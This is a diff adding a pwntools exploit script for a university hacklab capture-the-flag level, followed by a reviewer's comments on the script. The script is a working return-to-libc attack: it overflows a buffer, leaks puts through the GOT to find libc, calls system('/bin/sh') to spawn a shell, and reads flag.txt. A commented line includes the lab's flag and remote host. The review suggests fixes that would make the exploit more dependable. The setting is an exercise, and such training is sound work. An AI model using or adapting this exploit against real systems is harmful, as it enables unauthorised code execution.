9
78
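--- a/4/level9/test.py
+++ b/4/level9/test.py
@@ -0,0 +1,78 @@
+# 0x0000000000401263 : pop rdi ; ret
+
+from pwn import *
+
+HOST, PORT = "localhost", 4009
+#HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4009
+#p = remote(HOST, PORT)
+p = process('./level9')
+
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+#
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+#
+#payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
+#p.sendline(payload.encode())
+#print("sending: ", end='')
+#print(payload)
+#
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+#
+#question = p.recvline(timeout=2)
+#print("[+] question:", question.decode().strip())
+
+
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
+system_offset = libc.symbols['system'] # e.g. 0x04f550
+binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
+
+print(hex(puts_offset))
+print(hex(system_offset))
+print(hex(binsh_offset))
+
+elf = ELF('./level9')
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+main = elf.symbols['main']
+
+#help_input = p.recvline()
+#print(help_input)
+#puts_abs = int(help_input[-15:-1],16)
+#print(hex(puts_abs))
+
+p.recvuntil("What do you want to talk about?".encode())
+payload = b'A'*40
+payload += p64(0x0000000000401264)
+payload += p64(0x0000000000401263)
+payload += p64(puts_got)
+payload += p64(puts_plt)
+payload += p64(main)
+p.sendline(payload)
+print("send payload: ", payload)
+
+leak = p.recvline(timeout=999)
+print("[+] line:", leak)
+leak = p.recvline(timeout=999)
+print("[+] line:", leak)
+leak = p.recvline(timeout=999)
+print("[+] line:", leak)
+puts_abs = int.from_bytes(leak[:-1], 'little')
+print("[+] leaked puts:", hex(puts_abs))
+
+p.recvuntil("What do you want to talk about?".encode())
+
+payload = b'A'*40
+#payload += p64(0x0000000000401264)
+payload += p64(0x0000000000401263)
+payload += p64(puts_abs - puts_offset + binsh_offset)
+payload += p64(puts_abs - puts_offset + system_offset)
+p.sendline(payload)
+
+print("payload: ",payload)
+
+p.sendline("cat flag.txt".encode())
+p.interactive()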
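Review bot: The gadget constants are only half documented — the header comment names `0x0000000000401263` as `pop rdi ; ret`, but `0x0000000000401264`, pushed first in the leak payload and left commented out in the second, has no comment; presumably it is the bare `ret` one byte into the same gadget used to re-align the stack before the `puts` call, and that should be stated on the line: `payload += p64(0x0000000000401264)  # ret only (+1 into the gadget above), for 16-byte stack alignment`. `puts_abs = int.from_bytes(leak[:-1], 'little')` trusts that the third received line holds exactly the address bytes plus a newline; if the line carries anything else the derived base is silently wrong, so the subtraction deserves a sanity check such as `libc_base = puts_abs - puts_offset` followed by `assert libc_base & 0xfff == 0, hex(libc_base)` before it is reused in the second payload. The `timeout=999` on the three `recvline` calls means a failed leak hangs the script instead of failing fast. `libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')` hard-codes the local libc, so the offsets are only valid when the target runs the same build — worth a comment. The commented-out blocks (the remote target, the earlier question/answer exchange and the hex-string leak parser) are dead code and should be dropped or moved to the commit message.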